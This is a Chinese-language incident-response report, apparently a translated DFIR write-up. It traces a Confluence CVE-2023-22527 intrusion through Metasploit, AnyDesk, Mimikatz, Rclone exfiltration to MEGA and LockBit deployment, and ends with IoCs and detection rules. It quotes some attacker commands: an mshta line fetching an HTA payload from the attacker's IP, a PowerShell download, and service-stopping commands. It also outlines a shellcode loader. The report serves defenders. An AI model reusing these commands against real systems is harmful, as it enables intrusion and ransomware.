关键要点

• • 攻击者最初利用CVE-2023-22527漏洞成功获取到部署在公网中的Confluence服务器权限，最终导致 LockBit 勒索软件在整个环境中部署。
• • 攻击者利用了各种工具，包括 Mimikatz、Metasploit 和 AnyDesk。
• • 攻击者利用 RDP 进行横向移动，通过多种方法部署 LockBit 勒索软件，包括通过 SMB 共享复制文件以进行远程执行和通过 PDQ Deploy 自动分发。
• • 敏感数据使用 Rclone 泄露，将文件传输到 MEGA.io 云存储。
• • 从边界突破到最终部署勒索软甲仅经过两个小时左右。

案例总结

攻击者利用CVE-2023-22527远程代码执行漏洞获取到部署在Windows服务器上的Confluence权限。尝试执行一系列命令，包括 net user 和 whoami。

不久之后，攻击者试图通过 curl 下载 AnyDesk，但尝试失败。然后，他们转向使用 mshta 下载包含 Metasploit载荷的远程 HTA 文件。在与 Metasploit C2服务器建立连接后，他们利用它成功下载并安装了 AnyDesk。安装后，AnyDesk 配置了预设密码，为攻击者提供持续的远程访问。

在 10 分钟内，攻击者使用 tasklist 收集进程列表，识别出几个感兴趣的进程，然后终止这些进程。我们评估这些进程属于先前的攻击者，通过杀死它们，攻击者确保了对服务器的独占控制权。值得注意的是，他们终止了 PowerShell，无意中杀死了自己的 Metasploit 进程😅。这迫使他们重新运行漏洞利用程序，以部署新的 Metasploit 载荷并重新建立C2连接。重新获得访问权限后，他们创建了一个新的本地帐户，并将其添加到 Administrators 组。

随后他们使用新创建的用户通过RDP登录到失陷主机上，然后执行了 Mimikatz。接下来，他们利用 SoftPerfect 的 NetScan 扫描整个网络中的存活主机。利用这些信息，他们定位到了备份服务器，并使用默认管理员账户RDP到了该服务器上。

在备份服务器上，攻击者执行了 PowerShell 脚本 Veeam-Get-Creds-New.ps1 来提取 Veeam 凭据。然后，他们通过 RDP 横向移动到文件共享服务器。他们部署了 Rclone 来将数据外发到 MEGA.io。之后，他们清除了文件服务器上的所有 Windows 事件日志。

然后，攻击者使用域管理员凭据通过 RDP 横向移动到域控服务器。进入域控服务器后，他们枚举了域管理员组成员身份。同时，他们返回备份服务器查看其配置。

不久之后，攻击者在整个环境中部署了 LockBit 勒索软件。他们首先通过其活动的 RDP 会话在备份服务器和文件共享服务器上手动执行勒索软件。为了确保加密在整个域范围生效，他们回到最初失陷的主机，在那里他们利用合法的企业部署工具 PDQ Deploy 在网络的其余部分自动分发勒索软件。

使用 PDQ Deploy，攻击者通过 SMB 将勒索软件二进制文件和批处理脚本分发到远程主机。然后，他们通过 PDQ 远程执行脚本，触发了跨多个系统的勒索软件部署。接下来，他们转向了 Exchange 服务器。

在 Exchange 服务器上，攻击者使用 net stop 和 taskkill 停止了关键服务。然后，他们将勒索软件二进制文件与新的批处理脚本一起部署，该脚本在执行时会启动勒索软件加密。此脚本旨在挂载远程系统的 C$ 共享，从而有效地执行二次加密，这是一种故障保护机制，以防 PDQ Deploy 错过任何目标。

勒索软件 （TTR） 的时间刚刚超过 2 小时 （02:06:14），使其成为一次极其快速的入侵。

入侵路径分析

边界突破

2024 年 2 月初，我们处理了一起由边界Windows服务器漏洞引发的入侵事件。该服务器存在 2024 年 1 月 16 日披露的 Confluence 远程代码执行 （RCE） 漏洞。

Confluence 远程代码执行漏洞利用

攻击者最初通过利用暴露的 Atlassian Confluence 服务器中的服务器端模板注入漏洞（CVE-2023-22527、CVSS 10.0）获得访问权限。此漏洞允许未经身份验证的攻击者通过注入 OGNL 表达式在目标服务器上执行任意命令。攻击者的IP为92[.]51.2.22，如以下 Suricata 警报所示。

攻击者执行的第一个命令是 net user 和 whoami。这些用于枚举受感染的 Windows 服务器上的用户帐户，并收集有关当前受影响用户的信息。此外，从UA上推测，该漏洞可能是通过Python脚本进行攻击利用的。

该漏洞是由于未正确处理 Confluence 中某些模板文件中用户提供的输入而引起的。具体来说，像 confluence/template/xhtml/pagelist.vm 这样的文件接受传递给潜在危险函数的参数，而没有进行足够的清理。例如，可以纵 $stack.findValue 函数以注入恶意对象图导航语言 （OGNL） 表达式，从而导致任意代码执行。攻击者可以通过向特定端点（例如 /template/aui/text-inline.vm）发送精心编制的 HTTP POST 请求来利用此漏洞，并在参数中包含恶意负载。有关漏洞的其他详细信息，请参阅以下报告：Trend Micro 和 Splunk。

载荷执行

在运行初始发现命令后，攻击者试图使用漏洞利用从他们的服务器下载 AnyDesk 安装程序。

但是，执行 curl 无法下载 AnyDesk 安装程序。这并没有阻止后来通过其他方式成功下载 AnyDesk 安装程序的攻击者。

Meterpreter

在获得初始访问权限大约 10 分钟后，攻击者利用本机 Windows mshta.exe 实用程序下载并执行 Metasploit 阶段载荷。

mshta http://92.51.2[.]22:443/UsySLX1n.hta

正如 lolbas 项目中所概述的，这种技术使攻击者能够将有效负载放入 INetCache 目录并直接从该目录中执行，从而利用受信任的系统实用程序来逃避检测。

HTA 文件执行编码的 PowerShell 命令。

HTA 文件的内容：

此编码命令会生成另一个具有模糊处理命令行的 PowerShell 进程。

要对命令行进行反混淆处理，必须：

• • 删除连接字符串的 + 符号。
• • 将 {0}、{1} 和 {2} 分别替换为 =、6 和 P。
• • Base64 解码生成的字符串。
• • Gzip 解压 base64 解码后的字符串。

结果是以下 PS 脚本，该脚本执行以下作：

1. 1. 获取指向特定 Windows API 函数的指针：VirtualAlloc()、VirtualProtect()、CreateThread() 和 WaitForSingleObject()。
2. 2. 通过 VirtualAlloc() 分配具有 PAGE_EXECUTE_READWRITE （0x40） 权限的新内存区域。
3. 3. 将 base64 解码的 Metasploit shellcode 复制到新分配的内存区域中。
4. 4. 将新内存区域的保护更改为 PAGE_EXECUTE （0x10）。
5. 5. 创建一个指向新内存区域开头的新线程，以执行 Metasploit shellcode。
6. 6. 等待 shellcode 执行结束。

Metasploit shellcode 可以通过 speakeasy 模拟来识别命令和控制服务器。

权限维持

攻击者通过powershell命令下载安装AnyDesk，在安装的同时会创建系统服务，确保AnyDesk跟随开机启动。

powershell -c (New-Object Net.WebClient).DownloadFile('http://download.anydesk.com/AnyDesk.msi', 'AnyDesk.msi')

Windows 系统事件 7045 显示服务创建。详细信息显示将启动 AnyDeskMSI.exe，并且启动类型设置为 auto，因此它将在服务器重启后运行。

攻击者使用了两个有效账户，并在最初的失陷主机主机上创建了一个新账户。用户 “backup” 已创建，给定密码，并添加到本地 “Administrator” 组。Sysmon 事件代码 1 显示了为执行活动而运行的命令：

Windows 安全事件 4720“已创建用户帐户”和 4732“已将成员添加到启用安全的本地组”显示创建用户，然后将用户添加到管理员组。由于用户名未显示在 4732 事件中。确保比较唯一的安全标识符 （SID）：

权限提升

Confluence服务本身以SYSTEM权限运行，因此攻击者直接获得了最初的失陷主机的最高权限。这用于创建名为 'backup' 的本地管理员用户。借助“backup”用户，攻击者能够通过其 Metasploit 有效载荷通过代理连接 RDP 到最初的失陷主机并执行 mimikatz。mimikatz 执行导致最初的失陷主机上的“管理员”账户的易破解哈希值被泄露。遗憾的是，此密码在环境中的主机之间重复使用。利用文件服务器上的“管理员”帐户，攻击者能够找到其他特权帐户帐户的明文凭据（请参阅“凭据访问”）。

防御规避

通过他们在最初的失陷主机的RDP会话，攻击者在开始菜单搜索中输入了'病毒'，以导航到'病毒和威胁防护'设置，以确保Windows Defender完全关闭。

通过 Rclone 从文件服务器中泄露数据后，Windows 事件日志通过 PowerShell 清除：

使用的 wevtutil 开关：

el | enum-logs 列出日志名称cl | clear-log 清除日志

攻击者还删除了他们带入环境的文件：

凭证访问

Mimikatz 在执行初始访问后仅 20 分钟就在最初失陷的主机上被执行。当 Anydesk 将文件写入磁盘时，这在主机上的内存中可以看到。

Sysmon 事件代码 1 显示了 Mimikatz 的执行：

Sysmon 事件代码 10 显示 Mimikatz 访问了 LSASS 进程，我们还可以看到 Mimikatz 的后续 GrantedAccess 0x1010 ，它转换为：PROCESS_QUERY_LIMITED_INFORMATION （0x1000） 和 PROCESS_VM_READ （0x0010） 。

Sysmon 事件代码 11 显示 Mimikatz 进程创建了一个名为 passwords.txt 的文件：

最后，攻击者通过在记事本中打开新生成的密码文件来查看捕获的密码，如 Sysmon 事件代码 1 中所述：

攻击者还在备份服务器上运行了脚本 Veeam-Get-Creds-New.ps1：

如果启用了 powershell 脚本块日志记录，则 Powershell 脚本将记录在事件代码 4104 下：

该脚本看起来来自 sadshade/veam-creds GitHub 存储库，并且该脚本尝试从 Veeam 凭证管理器获取凭证。

攻击者还在文件共享服务器上发现了一个 txt 文件，其中包含与 IT 相关的明文密码。其中包括 Domain Admin 帐户的凭据🤣。通过他们的 RDP 会话，他们继续使用记事本打开 txt 文件。通过流程执行证据进行如下说明：

内网探测

以下命令是通过 Confluence RCE 执行的：

net userwhoamiquery user

在 Meterpreter 会话中，tasklist 用于枚举正在运行的进程。该攻击者识别了由其他行为者建立的 C2 进程，并使用“taskkill”来结束它们。

在此任务期间，我们注意到一个攻击者失误：“powershell.exe”上的“taskkill”执行杀死了他们自己的 Meterpreter 会话。因此，他们重新利用 Confluence 来建立另一个 Meterpreter 会话。然后，在主机上执行进一步的发现命令：

query usernet userhostnameipconfig

然后使用 NetScan 枚举本地网络：

在启用“检查写入访问权限”选项的情况下执行 NetScan 时，将创建一个“delete.me”文件，然后在发现的共享上删除该文件。我们可以在事件 ID 5145 中观察到这一点：

移动到域控服务器后，再次执行“query user”。然后，在拼写错误后枚举了 Domain Admins 组：

横向移动

在整个侵入过程中，RDP 用于横向移动。在 Confluence 最初的失陷主机上使用了 'Remote Desktop Connection' 应用程序 （mstsc.exe），以交互方式登录到环境中的目标主机。事件 ID 4624 登录活动：

使用 RDP 快速连续对不同的宿主进行横向移动。在最初的失陷主机主机最初入侵后不到一小时开始。所有 RDP 均从最初的失陷主机进行。

数据收集

攻击者使用 Rclone 泄露了文件共享中的所有内容，有关更多详细信息，请参阅“泄露”。但是，有几组文件被复制到最初的失陷主机的 C：temp，然后在大约 30 秒后删除。

远程控制

Metasploit

命令和控制 （C2） 连接是通过 Metasploit 建立的，从被攻破的 Confluence 服务器到 IP 地址 92.51.2[.]22 托管在名为 Flyservers SA 的提供商中，其他博客报道称被 LockBit 组织使用。

连接到端口 4321。

下载 Meterpreter HTA 载荷时，攻击者使用与 Internet Explorer 下载了它。

AnyDesk

第二个 C2 服务器 92.51.2[.]27 是 AnyDesk服务端。

通过 Fofa，可以识别在与事件相关的时间段内与服务器关联的主机名 WIN-EKIHV2OQQP8。

在最初失陷的主机上的登录活动中观察到此入侵的主机名。

可以通过 RDP 服务（端口 3389）上的证书跟踪主机名，自 2023 年 10 月底起生效。

通过在 fofa.info 中搜索此主机名，可以识别过去与 VirusTotal 中的恶意活动相关的多个 IP 地址，下图中的一些示例。

根据 @JRehbergCSK 发布的推文，对 Censys 的相同搜寻使我们能够识别出可能与 ShadowSyndicate 勒索软件组织相关的六个 IP 地址。

一些已识别的 IP 地址，如 194.165.16[.]60 和 45.227.252[.]227 在 Group-IB 关于 ShadowSyndicate 的报告中也被提及。

AnyDesk 连接被用来传输程序来枚举基础设施、访问凭据以及泄露和加密数据。

数据外泄

在初始访问后仅 1 小时 11 分钟，攻击者就开始了数据外发活动。这是从文件共享服务器完成的，使用 Rclone 执行并泄露到大型 （Mega.nz）。我们之前已经多次报道了 rclone 的使用情况。

我们能够检索到使用的 Rclone 配置文件：

如上所示，配置文件已加密并受密码保护。幸运的是，攻击者安全意识也不高😂，他们存在密码复用问题，因此我们能够使用 “rclone config show ”命令解密文件。

从 Zeek 网络日志中，我们看到数据被泄露：

Suricata 还对这一活动发出了警报：

从网络流量中，我们看到使用 rclone 完成的 HTTP 帖子：

目标达成

入侵大约两个小时后，攻击者将 PDQ Deploy 和 LockBit Black 可执行文件上传到最初失陷的主机上的 C：Temp 文件夹下。然后，在域控服务器上也创建了相同的文件。PDQ Deploy 是一种软件工具，旨在自动执行补丁管理和部署应用程序。在这种情况下，它被用来促进 LockBit 勒索软件的部署。

在攻击者使用 PDQ 之前，他们首先在后端服务器和文件服务器上的 RDP 会话上手动运行 LockBit 二进制文件。

下一个部署过程从从滩头系统执行 PDQ Deploy 开始。组织可以利用 PDQ Deploy 为最终用户远程高效地创建多步骤部署，支持各种格式，如 .exe、.msi、.bat、.ps1 和 .vbs。PDQ Deploy 允许管理员在与 Spiceworks、Active Directory 或 PDQ Inventory 集成的远程计算机和组上执行脚本和命令（例如 PowerShell、VBScript 和批处理文件）。该工具还提供部署报告以监控和跟踪成功的部署。

PDQ Deploy 通过两个系统服务执行操作:

• • PDQDeployService.exe 是管理控制台上所有计划和部署的后台服务。
• • PDQDeployRunner-n（例如 PDQDeployRunner-1）是在远程主机上执行以执行部署的目标服务。

在部署过程中，部署包的目标服务和安装文件将复制到目标计算机的默认共享上的目录，从而可以执行部署任务。

为了促进使用 PDQ 进行勒索软件部署，攻击者创建了一个名为 asd.bat 的文件来启动 LockBit 可执行文件。

asd.bat content: asd.bat内容：

我们能够从最初的失陷主机的 C：ProgramDataAdmin ArsenalPDQ Deploy 收集 PDQ .db文件，以查看攻击者创建的部署数据。

攻击者通过其“backup”用户登录：

用于部署的域管理员用户/凭据：

PDQ 库中包含的文件：

攻击者多次运行部署包：

尝试执行勒索软件的几种方法包括调用文件、命令参数，最后是批处理文件：

从攻击者开始部署，我们观察到 PDQ 服务运行程序和软件包文件（勒索软件和批处理文件）都在 SMB 上部署。

然后，通过 PDQ 运行程序在整个环境中的主机上执行此批处理文件。

使用 PDQ 完成部署后，攻击者使用 RDP 连接到 Exchange 服务器。他们发出了一些命令来停止运行与服务器上的 Exchange 和 SQL 关联的进程：

process net stop MSExchangeUMprocess taskkill /f /im sql*

然后，他们放置了一个批处理文件 test.bat，其中包含在入侵期间之前发现的系统列表，以及勒索软件执行命令。这似乎是一次备份，用于尝试打击在 PDQ 部署期间可能遗漏的系统。

以下是test.bat内容的摘录：

勒索软件攻击完成后，受影响的文件被重命名为 .rhddiicoE 扩展名，并在受感染的主机上留下了名为 rhddiicoE.README.txt 的赎金票据。

此外，作为勒索软件执行的一部分，桌面背景图像也被修改。

时间线

钻石型号

IoCs

Atomic

92[.]51.2.2292[.]51.2.27

Computed

asd.bat438448FDC7521ED034F6DABDF814B6BAF08E7343A94897ADEAE78138CC3F9142ED160A031E2E25A996F72089F12755F931E7FCA9B64DD85B03A56A9871FD6BB8F2CF1DBBnetscan.exeD7ADDB5B6F55EAB1686410A17B3C867BA54AF16B2702FE0E5C569F6D8F17574A9FDAF197498BA0AFA5D3B390F852AF66BD6E763945BF9B6BFF2087015ED8612A18372155test.bat9D495530A421A7C7E113B7AFC3A5050402D291E2FF5799A13EACC72AD0758F2C5E69D414594F2F8AB05F88F765D05EB1CF24E4C697746905A61ED04A6FC2B744DD6FEBB0Veeam-Get-Creds-New.ps13BD63B2962D41D2E29E570238D28EC0E9537E1C4E5DDD7FB9B98C532CA89A9DB08262AB47AA8E510B9C3B5D39F84E4C2FA68C81DA888E091436FDB7FEE276EE7FF87F016

Behavioral

LSASS Memory - T1003.001System Network Configuration Discovery - T1016Remote System Discovery - T1018Remote Desktop Protocol - T1021.001System Owner/User Discovery - T1033Network Service Discovery - T1046Process Discovery - T1057PowerShell - T1059.001Windows Command Shell - T1059.003Clear Windows Event Logs - T1070.001Software Deployment Tools - T1072Ingress Tool Transfer - T1105Exploit Public-Facing Application - T1190System Binary Proxy Execution: Mshta - T1218.005Remote Access Software - T1219Data Encrypter for Impact - T1486Credentials In Files - T1552.001Exfiltration to Cloud Storage - T1567.002Create or Modify System Process: Windows Service - T1543.003Valid Accounts: Local Accounts - T1078.003

Detections

Network

ET ATTACK_RESPONSE PowerShell Base64 Encoded Content Command Common In Powershell Stagers M1ET ATTACK_RESPONSE PowerShell NoProfile Command Received In Powershell StagersET EXPLOIT Atlassian Confluence RCE Attempt Observed (CVE-2023-22527) M1ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199)ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dlET HUNTING PE EXE Download over raw TCPET HUNTING PowerShell Hidden Window Command Common In Powershell Stagers M1ET INFO Dotted Quad Host HTA RequestET INFO User-Agent (python-requests) Inbound to WebserverET MALWARE Possible Metasploit Payload Common Construct Bind_API (from server)ET POLICY Possible HTA Application DownloadET WEB_CLIENT HTA File containing Wscript.Shell Call - Potential CVE-2017-0199ET WEB_CLIENT PowerShell call in script 1ET WEB_CLIENT PowerShell call in script 2ET WEB_SERVER Possible SQL Injection (exec) in HTTP Request BodyET WEB_SERVER WebShell Generic - net userET WEB_SPECIFIC_APPS Atlassian Confluence CVE-2023-22515 Vulnerable Server Detected M1ET WEB_SPECIFIC_APPS Atlassian Confluence CVE-2023-22515 Vulnerable Server Detected M2ET WEB_SPECIFIC_APPS Atlassian Confluence CVE-2023-22518 Vulnerable Server Detected Version 8.x M1ET WEB_SPECIFIC_APPS Atlassian Confluence CVE-2023-22518 Vulnerable Server Detected Version 8.x M2ETPRO ATTACK_RESPONSE Possibly Malicious VBScript Executing WScript.Shell Run M1ETPRO HUNTING Observed Suspicious Base64 Encoded Wide String Inbound (zip)ETPRO HUNTING Suspicious Offset PE EXE or DLL Download on Non-Standard PortsETPRO MALWARE Possible Malicious VBScript calling PowerShell over HTTPETPRO MALWARE Possible Malicious VBScript calling PowerShell over HTTP 1 M2

Sigma

Search rules on detection.fyi or sigmasearchengine.com

DFIR Public Rules Repo:

8a0d153f-b4e4-4ea7-9335-892dfbe17221  :  NetScan Share Enumeration Write Access Check

DFIR Private Rules:

1aafd4cc-cb38-498b-9365-394f71fd872c  :  Veeam Credential Dumping Script (PSH)8a64fe8d-e9d5-4c8c-9716-0ceed9b3b791  :  Notepad Password Files Discoveryb878e8c2-bfa5-4b1d-8868-a798f57d197a  :  Veeam Credential Dumping Script Execution53c4b596-8af3-42f3-a974-bddfbf6db731  :  Wevtutil.exe Log Clearing Process Execution516c6fbc-949a-4aa7-8727-c041aee56dc0  :  Execution of Remote HTA File via mshta.exe8a64fe8d-e9d5-4c8c-9716-0ceed9b3b791  :  Notepad Password Files Discovery3a9897de-164a-4b5a-8995-ffdc301d6f6d  :  Confluence Executing Suspicious Commands7019b8b4-d23e-4d35-b5fa-192ffb8cb3ee  :  Use of Rclone to exfiltrate data over an SSH channel62047536-b23d-4aef-af94-b6095aea1617  :  Data Exfiltration Using Rclone with Cloud Storage

Sigma Repo:

cd951fdc-4b2f-47f5-ba99-a33bf61e3770    :    Always Install Elevated Windows Installere32d4572-9826-4738-b651-95fa63747e8a    :    Base64 Encoded PowerShell Command Detected7d9263bd-dc47-4a58-bc92-5474abab390c    :    Change Winevt Channel Access Permission Via Registry2f78da12-f7c7-430b-8b19-a28f269b77a3    :     Disable Windows Event Logging Via Registryfcddca7c-b9c0-4ddf-98da-e1e2d18b0157    :    Disabled Windows Defender Eventlog61065c72-5d7d-44ef-bf41-6a36684b545f    :    Elevated System Shell Spawned98767d61-b2e8-4d71-b661-e36783ee24c1    :    Gzip Archive Decode Via PowerShella642964e-bead-4bed-8910-1bb4d63e3b4d    :    HackTool - Mimikatz Execution502b42de-4306-40b4-9596-6f590c81f073    :    Local Accounts Discoveryf26c6093-6f14-4b12-800f-0fcb46f5ffd0    :    Malicious Base64 Encoded PowerShell Keywords in Command Lines183e7ea8-ac4b-4c23-9aec-b3dac4e401ac    :    Net.EXE Executioncd219ff3-fa99-45d4-8380-a7d15116c6dc    :    New User Created Via Net.EXEf4bbd493-b796-416e-bbf2-121235348529    :    Non Interactive PowerShell Process Spawnedd679950c-abb7-43a6-80fb-2a480c4fc450    :    PDQ Deploy Remote Adminstartion Tool Executiond7bcd677-645d-4691-a8d4-7a5602b780d1    :    Potential PowerShell Command Line Obfuscation8e0bb260-d4b2-4fff-bb8d-3f82118e6892    :    Potentially Suspicious CMD Shell Output Redirectfdb62a13-9a81-4e5c-a38f-ea93a16f6d7c    :    PowerShell Base64 Encoded FromBase64String Cmdlet3b6ab547-8ec2-4991-b9d2-2b06702a48d7    :    PowerShell Download Pattern6e897651-f157-4d8f-aaeb-df8151488385    :    PowerShell Web Download86085955-ea48-42a2-9dd3-85d4c36b167d    :    Process Terminated Via Taskkillb52e84a3-029e-4529-b09b-71d19dd27e94    :    Remote Access Tool - AnyDesk Executionb98d0db6-511d-45de-ad02-e82a98729620    :    Remotely Hosted HTA File Executed Via Mshta.EXE2aa0a6b4-a865-495b-ab51-c28249537b75    :    Startup Folder File Write88872991-7445-4a22-90b2-a3adadb0e827    :    Stop Windows Service Via Net.EXE590a5f4c-6c8c-4f10-8307-89afe9453a9d    :    Suspicious Child Process Created as System7be5fb68-f9ef-476d-8b51-0256ebece19e    :    Suspicious Execution of Hostnamefb843269-508c-4b76-8b8d-88679db22ce7    :    Suspicious Execution of Powershell with Base645cb299fc-5fb1-4d07-b989-0644c68b6043    :    Suspicious File Download From IP Via Curl.EXEd75d6b6b-adb9-48f7-824b-ac2e786efe1f    :    Suspicious FromBase64String Usage On Gzip Archive - Process Creation03cc0c25-389f-4bf8-b48d-11878079f1ca    :    Suspicious MSHTA Child Process754ed792-634f-40ae-b3bc-e0448d33f695    :    Suspicious PowerShell Parent Process2617e7ed-adb7-40ba-b0f3-8f9945fe6c09    :    Suspicious SYSTEM User Process Creation63332011-f057-496c-ad8d-d2b6afb27f96    :    Suspicious Tasklist Discovery Commandce72ef99-22f1-43d4-8695-419dcb5d9330    :    Suspicious Windows Service Tamperingd0d28567-4b9a-45e2-8bbc-fb1b66a1f7f6    :    Unusually Long PowerShell CommandLinee28a5a99-da44-436d-b7a0-2afc20a5f413    :    Whoami Utility Execution8de1cbe8-d6f5-496d-8237-5f44a721c7a0    :    Whoami.EXE Execution Anomaly79ce34ca-af29-4d0e-b832-fc1b377020db    :    Whoami.EXE Execution From Privileged Process671bb7e3-a020-4824-a00e-2ee5b55f385e    :    WMI Module Loaded By Uncommon Process

Yara

https://github.com/The-DFIR-Report/Yara-Rules/blob/main/27244/27244.yar

https://github.com/The-DFIR-Report/Yara-Rules/blob/main/27138/27138.yar#L13

https://github.com/The-DFIR-Report/Yara-Rules/blob/main/27138/27138.yar#L46

BINARYALERT_Hacktool_Windows_Mimikatz_CopywriteBINARYALERT_Hacktool_Windows_Mimikatz_FilesELASTIC_Windows_Trojan_Metasploit_38B8CeecELASTIC_Windows_Trojan_Metasploit_47F5D54AELASTIC_Windows_Trojan_Metasploit_4A1C4Da8ELASTIC_Windows_Trojan_Metasploit_7Bc0F998ELASTIC_Windows_Trojan_Metasploit_C9773203GODMODERULES_IDDQD_God_Mode_RuleSECUINFRA_SUSP_Powershell_Base64_DecodeSIGNATURE_BASE_MAL_RANSOM_Lockbit_Apr23_1SIGNATURE_BASE_MAL_RANSOM_Lockbit_Forensicartifacts_Apr23_1SIGNATURE_BASE_Msfpayloads_Msf_RefSIGNATURE_BASE_Powershell_Susp_Parameter_ComboMAL_RANSOM_LockBit_Apr23_1MAL_RANSOM_LockBit_ForensicArtifacts_Apr23_1SIGNATURE_BASE_MAL_RANSOM_Lockbit_Apr23_1SIGNATURE_BASE_MAL_RANSOM_Lockbit_Forensicartifacts_Apr23_1ELASTIC_Windows_Ransomware_Lockbit_369E1E94CRAIU_Crime_Lockbit3_Ransomware

MITRE ATT&CK

Clear Windows Event Logs - T1070.001Create Account - T1136Credentials In Files - T1552.001Data Encrypted for Impact - T1486Exfiltration to Cloud Storage - T1567.002Exploit Public-Facing Application - T1190Ingress Tool Transfer - T1105LSASS Memory - T1003.001Mshta - T1218.005Network Service Discovery - T1046PowerShell - T1059.001Process Discovery - T1057Remote Access Software - T1219Remote Desktop Protocol - T1021.001Remote System Discovery - T1018Software Deployment Tools - T1072System Network Configuration Discovery - T1016System Owner/User Discovery - T1033Windows Command Shell - T1059.003Windows Service - T1543.003